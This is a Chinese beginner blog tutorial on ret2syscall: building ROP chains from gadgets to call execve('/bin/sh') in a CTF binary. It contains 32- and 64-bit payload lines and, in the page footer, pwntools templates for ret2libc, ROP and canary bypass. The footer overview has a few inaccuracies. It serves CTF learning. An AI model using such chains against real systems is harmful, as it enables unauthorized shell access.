栈溢出漏洞利用二,ret2syscall,构造rop链条实现攻击(pwn入门)

已于 2024-06-12 20:27:43 修改
阅读量1.2k 收藏 17
点赞数 37
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: linux 运维 服务器 网络安全 安全
于 2024-06-12 19:08:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_83422357/article/details/139632160

原理

原理就直接参考别的大佬写的文章讲下了

 参考文章:

https://blog.youkuaiyun.com/qq_33948522/article/details/93880812

ret2syscall,即控制程序执行系统调用,获取 shell

ret2syscall通常采用execve(重点函数,32位调用号为0x0b,64位调用号为0x3b)

ROP

Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。

一般的栈结构:
      高地址                          +-----------------+
                                           |     retaddr     |
                                           +-----------------+
                                           |    saved ebp |
                               ebp--->+-----------------+
                                           |                     |
                                           |                     |
                                           |                     |
                                           |                     |
                                           |                     |
                                           |                     |
      低地址               esp-->+-----------------+

Gadgets
以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。

ROP 攻击一般得满足如下条件

程序存在溢出,并且可以控制返回地址。
可以找到满足条件的 gadgets 以及相应 gadgets 的地址。
如果 gadgets 每次的地址是不固定的,那我们就需要想办法动态获取对应的地址了。

每一个gadgets都含有ret是为了能够使得程序自动持续的选择堆栈中的指令依次执行

ret指令可以理解成取栈顶的数据作为下次跳转的位置。即,

eip = [esp];

esp = esp+4;

ret 修改eip 和 esp的值

或者简单理解成: pop eip; (pop指令会附加esp的移动,意思是取栈顶的数据作为下次跳转的位置)然后执行 jump

相比之下,call指令即 :push eip;(此时eip为call指令的下一条指令的地址,意思是将call指令的下一条指令地址压入栈) 然后 jump

函数返回时通常会执行下列指令

mov esp ,ebp
pop ebp  上述两条指令使ebp , esp指向原来的栈,此时esp指向返回地址
ret      使eip变为返回地址,然后jmp
Linux系统调用的实现
Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是:

应用程序调用库函数(API);
API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态;
内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用);
系统调用完成相应功能,将返回值存入 EAX,返回到中断处理函数;
中断处理函数返回到 API 中;
API 将 EAX 返回给应用程序。
应用程序调用系统调用的过程是:

把系统调用的编号存入 EAX;
把函数参数存入其它通用寄存器;
触发 0x80 号中断(int 0x80)。
Syscall的函数调用规范为:execve(“/bin/sh”, 0,0);

所以,eax = 0xb | ebx = address 0f ‘/bin/sh’ | ecx = 0 | edx = 0

它对应的汇编代码为:

pop eax# 系统调用号载入, execve为0xb,在linux系统中,函数的调用是有一个系统调用号的。我们实验要调用的execve("/bin/sh",null,null)函数其系统调用号是11,即十六进制0xb。
pop ebx# 第一个参数, /bin/sh的string
pop ecx# 第二个参数,0
pop edx# 第三个参数,0
int 0x80

 可以理解为拼接成一个系统调用的栈。

eaxebxecxedx中带入指定的参数拼接成关键的系统函数,最后在寻找int 0x80的地址,从而执行这些函数.

顺序

32位

eax->edx->ecx->ebx

64位

rdi->rsi->rdx->rcx->r8->r9

实战

以32位的举例子吧

例行检查,开了NX保护,给了一次输入,静态链接

IDA分析,存在/bin/sh字符串

根据上面的分析,可以确定就是使用ret2syscall的攻击手法了

使用ROPgadget工具抓取需要的值

按照上面原理的分析构造payload

payload = b'a'*padding+p32(pop_eax_ret)+p32(0xb)+ p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(0)+p32(binsh)+p32(int_0x80)

发送这串payload就可以把程序打下来提权了

至于64位的就是传参的顺序变了,其实大体的思路也是一样的。

如果真的理解了上面的原理,是可以自己写出来,可以和下面的payload对比一下

64位的payload

直接给出payload:

payload = b'a'* padding + p64(rax_ret)+ p64(0x3b) + p64(rdi_ret)+ p64(binsh_addr)+ p64(rdx_rsi_ret)+ p64(0)+ p64(0) + p64(syscall_ret) + p64(0)

写在最后:

有点时候不存在/bin/sh字符串也是可以用这种攻击手法打的,就是使用read函数把/bin/sh写入.bss段,也可以控制程序执行系统调用,获取 shell。

PWN基础-ROP技术-ret2syscall-64程序栈溢出利用
Welcome To Myon'Blog !
05-08 435
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 系统调用最后是执行 syscall。32 系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
pwn ret2syscall
young‘s blog
02-11 1043
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
栈溢出实例--笔记(ret2shellcode)
一只青木呀
08-01 2458
栈溢出实例--笔记(ret2shellcode)1、栈溢出含义及栈结构2、ret2shellcode基本思路3、实战一下3.1、进制程序如下3.2、分析调试查看栈3.3、编写payload获取shell3.4、操作结果 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 2、ret2shellcode基本思路 ret2shellcode需要我们控制程序执行shellcode代码。即ret2shellcode的目标就是在栈上写入布局好的shellcode,利用ret-address返回到
一个栈溢出的实验
学渣heviosr
07-26 2776
———-一:ret2addr和ret2reg(绕过随机化)———- 测试环境:Ubuntu 12.04 调试工具:gdb(可用图形界面工具:insight)+ core文件 说明:若直接在gdb里执行程序,地址空间和程序单独运行时不同。程序出段错误可生成core文件,保存出错时的上下文信息,结合gdb一起,可以得知程序单独运行时的一些状态。实验前设置core文件大小:u
ROP链:ret2syscall
小龙在线
09-13 468
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1320
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
ROP链-BUUCTF-inndy_ropret2syscall
Welcome To Myon'Blog !
05-08 452
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
PWN基础-ROP技术-ret2syscall突破NX保护
Welcome To Myon'Blog !
05-07 407
我们 ret2syscall 实际还是希望调用 execve,和 ret2shellcode 类似,只是多了堆栈不可执行。后面我们会继续发送内容(/bin/sh)给 read 函数,读取到 bss_addr。我们继续调用 execve,其 32 系统调用号是 11,即 0xb。没有找到,因此我们后面需要手动将 /bin/sh 写到 bss 段。我们先系统调用 read,其 32 系统调用号是 3,即 0x3。接下来我们找 /bin/sh 字符串的地址。32 程序,小端序,开启了 NX 保护。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3851
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
ROP链-BUUCTF-cmcc_simpleropret2syscall
最新发布
Welcome To Myon'Blog !
05-08 400
当然这个地址我们也可以通过符号表来找,因为这里的程序是静态链接的 ELF 文件,所有不能通过 plt 或者 got 表,因为压根就不存在。这样后面才能正常的 ret2syscall 传参,从而系统调用 execv。但是这里还有一个问题,程序没有类似于 pop [ecx] 这样的指令。利用思路类似,建议先看完我上面的这篇博客,我这里不再过多叙述。但是 read 函数执行后,它的三个参数还在栈顶上。
ret2syscall简单总结
ULGANOY的博客
07-05 1420
主要是自己的简单的学习总结。
ret2syscall知识点及例题
weixin_44864859的博客
05-19 840
rop 检查程序防护和基本信息 注意到此时开启了NX防护,所以无法使IP寄存器指向堆,栈。另外,注意这是statically linked(静态链接) 调试分析后,知道与之前一样同样在112个字节后同样可以控制返回地址,那怎么获得shell呢? 我们要思考,让程序跳转到什么地方呢? 由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell,所以我们利用程序中的 gadgets 来获得 shell,而对应的 shell 获取则是利用系统调用。 简单地说,只要我们把对应获取 shell 的系
RET2syscall
T_Fire_of_Square的博客
12-18 334
基本rop之一,意为call system,控制程序执行系统调用,获取shell。
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3311
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ret2syscall
EternalBurning的博客
11-10 546
ret2syscallchecksec查找溢出点计算偏移量1 手动计算2 脚本systemcall1 自动化脚本2 手动构造 checksec 查找溢出点 计算偏移量 1 手动计算 0x8048e8f和0x8048e93这两行明显是为调用函数准备参数,把参数的地址给压栈。这个地址就是gets函数写入地址的起始地址,也就是eax,此时距基址的距离是EBP-EAX,由于是32,所以返回地址在E...
ret2syscall前置知识
Rt1Text的博客
02-10 2866
1.目的 是拿到shell 2.具体操作 控制程序执行系统调用(字面理解就可) 3.系统调用是什么? 系统调用:system call 按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行 用户空间和内核空间可参考以下百度 用户空间_百度百科 (baidu.com) 系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行) 系统调用就运行在内核空间 4.具体怎么做 linux在x86系统 触发int 0x80 ,借助
ret2syscall 入门
akdelt的博客
01-24 609
系统调用是操作习系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作,网络通信,进程管理等。x86 通过 int 0x80 指令进行系统调用,amd64 通过 syscall 指令进行系统调用比如 write 函数32汇编代码系统调用号,触发 nr_writemov ebx,1mov edx,13int 0x80;中断触发系统调用‘’
ctf pwn栈溢出题目
01-25
### CTF PWN 栈溢出题目解题思路与漏洞利用教程 #### 一、栈溢出基础概念 栈溢出是一种常见的内存错误,当程序试图向栈中写入的数据量超过了分配给该变量的空间时就会发生。这种情况下,额外的数据会覆盖相邻的内存区域,可能导致程序行为异常甚至崩溃。在CTF竞赛中的PWN挑战里,攻击者可以巧妙地利用这一特性来改变程序执行流程,达到任意代码执行的目的。 #### 、常见技术手段及其应用场景 ##### (一)Return-to-libc (ret2libc) 这种方法适用于目标系统启用了NX保护的情况,在此条件下直接注入Shellcode变得不可行。通过精心构造输入数据,使得函数返回后跳转至`libc`库内的某个有用功能(如`system()`),并传递合适的参数指向环境变量或其他置存储的命令字符串(通常是`/bin/sh`)。这种方式不需要实际执行自定义机器码就能完成提权操作[^3]。 ```python from pwn import * # 建立连接 conn = remote('target_ip', port) # 构造payload offset_to_return_address = b'A' * offset_length address_of_system_function = pack(system_addr, 'little') argument_for_system_call = pack(bin_sh_string_addr, 'little') final_payload = offset_to_return_address + address_of_system_function + argument_for_system_call # 发送载荷触发漏洞 conn.send(final_payload) # 进入交互模式等待进一步指令 conn.interactive() ``` ##### ()Return-Oriented Programming (ROP) 对于开启了ASLR(Address Space Layout Randomization)机制的目标而言,单纯依靠固定的地址难以稳定工作。此时可采用ROP链的方式绕过这些限制。具体做法是从现有进制文件或共享库中挑选一系列短小精悍的小工具(gadgets),它们各自负责一小部分任务;然后按照一定顺序串联起来形成完整的恶意逻辑序列。最终目的是调用能够创建新进程或者打开shell等功能的方法[^1]。 ```python rop_chain = ROP(binary_path_or_elf_object) # 添加gadget到rop chain中... rop_chain.raw(pack(pop_rdi_gadget)) rop_chain.raw(pack(command_arg)) rop_chain.call(target_function_name) exploit_code = cyclic(offset_before_retaddr) + str(rop_chain) ``` ##### (三)Bypassing Canary Protection 现代操作系统为了防止缓冲区越界读取引发的安全隐患引入了canaries随机数作为屏障放置于局部数组之后但在保存下来的基址指针之前的置上。一旦检测到canary值被篡改,则立即终止应用程序以防事态扩大。然而如果能事先获知其确切数值的话还是有机会突破防线继续实施后续动作。可以通过格式化串漏洞或者其他途径间接获取canary的具体值。 ```python leaked_canary_value = u64(leak_response[-8:].ljust(8,b'\x00')) forgery_input = flat({ padding_len: leaked_canary_value, return_addr_offset: target_func_ptr }) ``` #### 三、实战案例分析 以一道典型的CTF PWN题目为例说明整个过程: 假设有一个存在栈溢出缺陷的服务端应用正在监听网络请求,它接受客户端发送过来的一条消息并将其打印出来。经过初步逆向工程得知其中确实隐藏着一处危险点允许外部操控EIP寄存器的内容。考虑到服务器部署环境中已经禁用了execve syscall以及所有形式的动态加载模块访问权限,因此决定采取基于静态链接版本下的return-oriented programming策略来进行破解尝试。 首先定到了几个关键性的辅助函数入口地址,包括但不限于`read()`, `write()`, 和最重要的`dup2()`用于重定向标准I/O描述符以便后期建立反向外连通道。接着便是着手准备必要的Rop Chain组件,这里涉及到多次试探性查询直至完全掌握堆栈布局细节为止。最后一步就是组合成完整有效的Payload并通过socket接口投递给远端主机上的易受攻击服务实例上去验证效果如何。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值